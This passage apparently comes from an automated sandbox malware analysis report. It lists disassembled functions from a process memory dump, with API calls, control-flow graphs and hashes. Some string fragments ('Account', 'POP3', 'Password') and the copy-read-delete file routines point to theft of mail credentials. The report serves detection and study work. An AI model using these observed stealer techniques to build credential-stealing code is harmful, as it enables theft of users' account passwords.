                                                                            • Instruction Fuzzy Hash: ED81C171A00368A9DB30DBA1DC85FEE7379EF85700F0005D6FA09E7190EAB16AC5CB95
                                                                            Function 2323C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(2323C7DD), ref: 2323C7E6
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                              • Part of subcall function 2323C803: GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                              • Part of subcall function 2323C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                              • Part of subcall function 2323C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2099061454-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: 3c202d2a345a4957afd082faea93aa7f23f7f4b684b40103ba9980a39e367eab
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: 5E0126C055537238A62376743C049AA5FDCDB23660B1837D6E20086093C9A087C2C3A9
                                                                            Function 2323C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 79 2323c7a7-2323c7bc 80 2323c7be-2323c7c6 79->80 81 2323c82d 79->81 80->81 83 2323c7c8-2323c7f6 call 2323c7e6 80->83 82 2323c82f-2323c833 81->82 84 2323c872 call 2323c877 82->84 85 2323c835-2323c83d GetModuleHandleA 82->85 90 2323c7f8 83->90 91 2323c86c-2323c86e 83->91 88 2323c83f-2323c847 85->88 88->88 92 2323c849-2323c84c 88->92 93 2323c85b-2323c85e 90->93 94 2323c7fa-2323c7fe 90->94 95 2323c870 91->95 96 2323c866-2323c86b 91->96 92->82 97 2323c84e-2323c850 92->97 98 2323c85f-2323c860 GetProcAddress 93->98 102 2323c865 94->102 103 2323c800-2323c80b GetProcAddress 94->103 95->92 96->91 100 2323c852-2323c854 97->100 101 2323c856-2323c85a 97->101 98->102 100->98 101->93 102->96 103->81 104 2323c80d-2323c81a VirtualProtect 103->104 105 2323c82c 104->105 106 2323c81c-2323c82a VirtualProtect 104->106 105->81 106->105
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                              • Part of subcall function 2323C7E6: GetModuleHandleA.KERNEL32(2323C7DD), ref: 2323C7E6
                                                                              • Part of subcall function 2323C7E6: GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                              • Part of subcall function 2323C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                              • Part of subcall function 2323C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2099061454-0
                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction ID: d3bd38a2004cf1ece24b983dba3dc5f7d0164fdf46037b9edf5e683abf0abf22
                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction Fuzzy Hash: 602138E24583A26FE7239B746C04BA67FD8DB13260F1C26D6D140CB143D5A89BD6C3A6
                                                                            Function 2323C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 107 2323c803-2323c80b GetProcAddress 108 2323c82d 107->108 109 2323c80d-2323c81a VirtualProtect 107->109 112 2323c82f-2323c833 108->112 110 2323c82c 109->110 111 2323c81c-2323c82a VirtualProtect 109->111 110->108 111->110 113 2323c872 call 2323c877 112->113 114 2323c835-2323c83d GetModuleHandleA 112->114 116 2323c83f-2323c847 114->116 116->116 117 2323c849-2323c84c 116->117 117->112 118 2323c84e-2323c850 117->118 119 2323c852-2323c854 118->119 120 2323c856-2323c85e 118->120 121 2323c85f-2323c865 GetProcAddress 119->121 120->121 124 2323c866-2323c86e 121->124 126 2323c870 124->126 126->117
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                                            • String ID:
                                                                            • API String ID: 2152742572-0
                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction ID: 91df996185b779b8dcc1b9d3461850154906e40474741573968a118eb02539fa
                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction Fuzzy Hash: B7F0A4C15553623CFA2365743C45EB65FDCC727660B183AD5A200C7183D89587C683F5

                                                                            Non-executed Functions

                                                                            Function 232360E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 232361DA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 232361E4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 232361F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 629306f433cd8e9280b3cba3c511f82de6c9f266815438c4dae917c9c9289031
                                                                            • Instruction ID: 8a115c5e9e4c587602239d5989f35cf2ca320b2d2b16b570c1a247da347d3789
                                                                            • Opcode Fuzzy Hash: 629306f433cd8e9280b3cba3c511f82de6c9f266815438c4dae917c9c9289031
                                                                            • Instruction Fuzzy Hash: 0B31C2B49113189BCB21DF24DD8878DBBB8AF18710F5081DAE81CA7250E7749BC18F45
                                                                            Function 23234AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082,23242108,0000000C,23231F3A,?), ref: 23234AD5
                                                                            • TerminateProcess.KERNEL32(00000000,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082,23242108,0000000C,23231F3A,?), ref: 23234ADC
                                                                            • ExitProcess.KERNEL32 ref: 23234AEE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 4cdf5d783ff810dde85570d5d4207c95239ee0469eb24f48a3505f5758ce1faa
                                                                            • Instruction ID: d6404c889b57ac7160f55db884bf09c0c3bf8a90efd748c5b2e58e205da317e0
                                                                            • Opcode Fuzzy Hash: 4cdf5d783ff810dde85570d5d4207c95239ee0469eb24f48a3505f5758ce1faa
                                                                            • Instruction Fuzzy Hash: 74E04676100208AFCF017F64CD4DA893B2AFF12B41B008090FA448B021CB39E9C2CA44
                                                                            Function 2323724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: 700332c11abcedf50bcb1828204868037aba2065745104ab197d4f4b637e0318
                                                                            • Instruction ID: 805e047d04d3b47a46730f62a8eb6e382439ba76d916b087f98f3b85c60eab85
                                                                            • Opcode Fuzzy Hash: 700332c11abcedf50bcb1828204868037aba2065745104ab197d4f4b637e0318
                                                                            • Instruction Fuzzy Hash: 4DA001706053028F9754AE35970E24D3AADAA65B91716816AAA09C5154EB28C4619A05
                                                                            Function 2323173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 136 2323173a-232317fe call 2323c030 call 23232c40 * 2 143 23231803 call 23231cca 136->143 144 23231808-2323180c 143->144 145 23231812-23231816 144->145 146 232319ad-232319b1 144->146 145->146 147 2323181c-23231837 call 23231ede 145->147 150 2323199f-232319ac call 23231ee7 * 2 147->150 151 2323183d-23231845 147->151 150->146 152 23231982-23231985 151->152 153 2323184b-2323184e 151->153 155 23231987 152->155 156 23231995-23231999 152->156 153->152 157 23231854-23231881 call 232344b0 * 2 call 23231db7 153->157 159 2323198a-2323198d call 23232c40 155->159 156->150 156->151 170 23231887-2323189f call 232344b0 call 23231db7 157->170 171 2323193d-23231943 157->171 165 23231992 159->165 165->156 170->171 185 232318a5-232318a8 170->185 173 23231945-23231947 171->173 174 2323197e-23231980 171->174 173->174 176 23231949-2323194b 173->176 174->159 178 23231961-2323197c call 232316aa 176->178 179 2323194d-2323194f 176->179 178->165 182 23231951-23231953 179->182 183 23231955-23231957 179->183 182->178 182->183 186 23231959-2323195b 183->186 187 2323195d-2323195f 183->187 188 232318c4-232318dc call 232344b0 call 23231db7 185->188 189 232318aa-232318c2 call 232344b0 call 23231db7 185->189 186->178 186->187 187->174 187->178 188->156 198 232318e2-2323193b call 232316aa call 232315da call 23232c40 * 2 188->198 189->188 189->198 198->156
                                                                            APIs
                                                                              • Part of subcall function 23231CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D1B
                                                                              • Part of subcall function 23231CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23231D37
                                                                              • Part of subcall function 23231CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D4B
                                                                            • _strlen.LIBCMT ref: 23231855
                                                                            • _strlen.LIBCMT ref: 23231869
                                                                            • _strlen.LIBCMT ref: 2323188B
                                                                            • _strlen.LIBCMT ref: 232318AE
                                                                            • _strlen.LIBCMT ref: 232318C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                            • API String ID: 3296212668-3023110444
                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction ID: fb598f50e94e270bb2e30410bddd74e3df208a4f4b5031900faa403012815ff2
                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction Fuzzy Hash: 1361F4F1D04329AAEF21ABA4CC40BDEB7B9AF17200F0444D6D245A7290DBB47AC78B55
                                                                            Function 232319B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                            • API String ID: 4218353326-230879103
                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction ID: fed4f684e8267619f6a4264abe10f76bbbf7b69ed2ad296beba5e90af00c93d0
                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction Fuzzy Hash: 787106F1D043695BDB21ABB49C84ADF7BFC9F1A200F1444E6D644D7241E6B4A7C5CBA0
                                                                            Function 23237CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 276 23237cc2-23237cd6 277 23237d44-23237d4c 276->277 278 23237cd8-23237cdd 276->278 280 23237d93-23237dab call 23237e35 277->280 281 23237d4e-23237d51 277->281 278->277 279 23237cdf-23237ce4 278->279 279->277 282 23237ce6-23237ce9 279->282 290 23237dae-23237db5 280->290 281->280 284 23237d53-23237d90 call 2323571e * 4 281->284 282->277 285 23237ceb-23237cf3 282->285 284->280 288 23237cf5-23237cf8 285->288 289 23237d0d-23237d15 285->289 288->289 292 23237cfa-23237d0c call 2323571e call 232390ba 288->292 295 23237d17-23237d1a 289->295 296 23237d2f-23237d43 call 2323571e * 2 289->296 293 23237db7-23237dbb 290->293 294 23237dd4-23237dd8 290->294 292->289 302 23237dd1 293->302 303 23237dbd-23237dc0 293->303 298 23237df0-23237dfc 294->298 299 23237dda-23237ddf 294->299 295->296 304 23237d1c-23237d2e call 2323571e call 232391b8 295->304 296->277 298->290 311 23237dfe-23237e0b call 2323571e 298->311 308 23237de1-23237de4 299->308 309 23237ded 299->309 302->294 303->302 313 23237dc2-23237dd0 call 2323571e * 2 303->313 304->296 308->309 316 23237de6-23237dec call 2323571e 308->316 309->298 313->302 316->309
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 23237D06
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390D7
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390E9
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390FB
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323910D
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323911F
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239131
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239143
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239155
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239167
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239179
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323918B
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323919D
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232391AF
                                                                            • _free.LIBCMT ref: 23237CFB
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 23237D1D
                                                                            • _free.LIBCMT ref: 23237D32
                                                                            • _free.LIBCMT ref: 23237D3D
                                                                            • _free.LIBCMT ref: 23237D5F
                                                                            • _free.LIBCMT ref: 23237D72
                                                                            • _free.LIBCMT ref: 23237D80
                                                                            • _free.LIBCMT ref: 23237D8B
                                                                            • _free.LIBCMT ref: 23237DC3
                                                                            • _free.LIBCMT ref: 23237DCA
                                                                            • _free.LIBCMT ref: 23237DE7
                                                                            • _free.LIBCMT ref: 23237DFF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 88090a361ad591bd0e472194af0b103cb88e20a6d4f33704a4e8359ad67b0b03
                                                                            • Instruction ID: 39f2bb9749752bab30c59776227c2012db27c2b655473e459e8037c66f943cba
                                                                            • Opcode Fuzzy Hash: 88090a361ad591bd0e472194af0b103cb88e20a6d4f33704a4e8359ad67b0b03
                                                                            • Instruction Fuzzy Hash: 14312AB161030ADFEB21AA38DD40B66B7E9AF02210F2444AAE959D7155DFB1FAC1CB14
                                                                            Function 232359D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _free.LIBCMT ref: 232359EA
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232359F6
                                                                            • _free.LIBCMT ref: 23235A01
                                                                            • _free.LIBCMT ref: 23235A0C
                                                                            • _free.LIBCMT ref: 23235A17
                                                                            • _free.LIBCMT ref: 23235A22
                                                                            • _free.LIBCMT ref: 23235A2D
                                                                            • _free.LIBCMT ref: 23235A38
                                                                            • _free.LIBCMT ref: 23235A43
                                                                            • _free.LIBCMT ref: 23235A51
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: c1dc515f6ef4fa58c5bb3c6e88b704d5ecb2cae48dea2a4e9c71a84759e377f4
                                                                            • Instruction ID: 9ccfb02ab4a77032ac1963f013d1fdbea58d9c71781e797b12f1bf6e54b261ab
                                                                            • Opcode Fuzzy Hash: c1dc515f6ef4fa58c5bb3c6e88b704d5ecb2cae48dea2a4e9c71a84759e377f4
                                                                            • Instruction Fuzzy Hash: 9A11A4BA520248EFCB21DF54DC41CDD3FA9EF15250B2540E1BA0C8B229DA71EB919B80
                                                                            Function 23231CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D1B
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23231D37
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D4B
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D58
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D72
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D7D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D8A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 1454806937-0
                                                                            • Opcode ID: 934cb9af19d5c5c5c8ea12ffbf363be39e6f5931298e5a8350620b48083ad47f
                                                                            • Instruction ID: 8766aad2bb596670dbfea043da8ea40b811e68f61f1f470da9861ee06917d932
                                                                            • Opcode Fuzzy Hash: 934cb9af19d5c5c5c8ea12ffbf363be39e6f5931298e5a8350620b48083ad47f
                                                                            • Instruction Fuzzy Hash: F2210EB195122CBFD710ABA08C8CFFB76ACEB29754F0449A6F515D2140D6B4AE868B70
                                                                            Function 23239492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 377 23239492-232394ef GetConsoleCP 378 23239632-23239644 call 23232ada 377->378 379 232394f5-23239511 377->379 381 23239513-2323952a 379->381 382 2323952c-2323953d call 23237c19 379->382 384 23239566-23239575 call 232379e6 381->384 389 23239563-23239565 382->389 390 2323953f-23239542 382->390 384->378 391 2323957b-2323959b WideCharToMultiByte 384->391 389->384 392 23239609-23239628 390->392 393 23239548-2323955a call 232379e6 390->393 391->378 394 232395a1-232395b7 WriteFile 391->394 392->378 393->378 399 23239560-23239561 393->399 397 2323962a-23239630 GetLastError 394->397 398 232395b9-232395ca 394->398 397->378 398->378 400 232395cc-232395d0 398->400 399->391 401 232395d2-232395f0 WriteFile 400->401 402 232395fe-23239601 400->402 401->397 403 232395f2-232395f6 401->403 402->379 404 23239607 402->404 403->378 405 232395f8-232395fb 403->405 404->378 405->402
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23239C07,?,00000000,?,00000000,00000000), ref: 232394D4
                                                                            • __fassign.LIBCMT ref: 2323954F
                                                                            • __fassign.LIBCMT ref: 2323956A
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23239590
                                                                            • WriteFile.KERNEL32(?,?,00000000,23239C07,00000000,?,?,?,?,?,?,?,?,?,23239C07,?), ref: 232395AF
                                                                            • WriteFile.KERNEL32(?,?,00000001,23239C07,00000000,?,?,?,?,?,?,?,?,?,23239C07,?), ref: 232395E8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1324828854-0
                                                                            • Opcode ID: 0e7c68370efea346d9f395cabd72f5c707ab33b924200a7fa5717f014a244c83
                                                                            • Instruction ID: c7035cc1e5dc81377fd29b965f4694de49bf5366e7e5ce4694148e21b34f0e82
                                                                            • Opcode Fuzzy Hash: 0e7c68370efea346d9f395cabd72f5c707ab33b924200a7fa5717f014a244c83
                                                                            • Instruction Fuzzy Hash: 92518EB1900209AFDB10DFA8DC95BDEBBF8EF1A300F14415AEA55E7291D670E981CF60
                                                                            Function 23233370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 406 23233370-232333b5 call 23233330 call 232337a7 411 232333b7-232333c9 406->411 412 23233416-23233419 406->412 414 23233439-23233442 411->414 415 232333cb 411->415 413 2323341b-23233428 call 23233790 412->413 412->414 418 2323342d-23233436 call 23233330 413->418 417 232333d0-232333e7 415->417 419 232333e9-232333f7 call 23233740 417->419 420 232333fd 417->420 418->414 428 232333f9 419->428 429 2323340d-23233414 419->429 421 23233400-23233405 420->421 421->417 424 23233407-23233409 421->424 424->414 427 2323340b 424->427 427->418 430 23233443-2323344c 428->430 431 232333fb 428->431 429->418 432 23233486-23233496 call 23233774 430->432 433 2323344e-23233455 430->433 431->421 438 232334aa-232334c6 call 23233330 call 23233758 432->438 439 23233498-232334a7 call 23233790 432->439 433->432 435 23233457-23233466 call 2323bbe0 433->435 441 23233483 435->441 442 23233468-23233480 435->442 439->438 441->432 442->441
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 2323339B
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 232333A3
